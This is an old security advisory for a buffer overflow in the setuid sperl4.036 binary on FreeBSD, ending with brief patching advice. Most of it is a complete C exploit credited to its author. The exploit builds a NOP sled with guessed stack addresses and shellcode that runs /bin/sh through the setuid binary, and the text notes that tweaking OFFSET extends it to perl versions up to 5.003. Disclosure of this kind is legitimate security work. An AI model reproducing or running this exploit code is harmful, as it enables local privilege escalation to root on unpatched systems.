COMMAND

    sperl4.036

SYSTEMS AFFECTED

    FreeBSD

PROBLEM

    With a little  modyfication of OFFSET  value you can  overflow all
    versions  up  to   perl5.003.   Credit  for   this  goes  to   OVX
    deliver@free.polbox.pl who made this exploit available.

    /************************************************************/
    /*   Exploit for FreeBSD sperl4.036 by OVX                  */
    /************************************************************/

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    #define BUFFER_SIZE     1400
    #define OFFSET          600

    char *get_esp(void) {
        asm("movl %esp,%eax");
    }
    char buf[BUFFER_SIZE];

    main(int argc, char *argv[])
    {
            int i;
            char execshell[] =
            "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
            "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
            "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
            "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

            for(i=0+1;i<BUFFER_SIZE-4;i+=4)
              *(char **)&buf[i] = get_esp() - OFFSET;

            memset(buf,0x90,768+1);
            memcpy(&buf[768+1],execshell,strlen(execshell));

            buf[BUFFER_SIZE-1]=0;

            execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
    }

SOLUTION

    Obtain  and  install  the  appropriate  patch  according  to   the
    instructions included with the  patch. If you have  installed Perl
    from source code, you should install source code patches.  Patches
    are available from the  CPAN (Comprehensive Perl Archive  Network)
    archives.  You may also remove suid bit util then.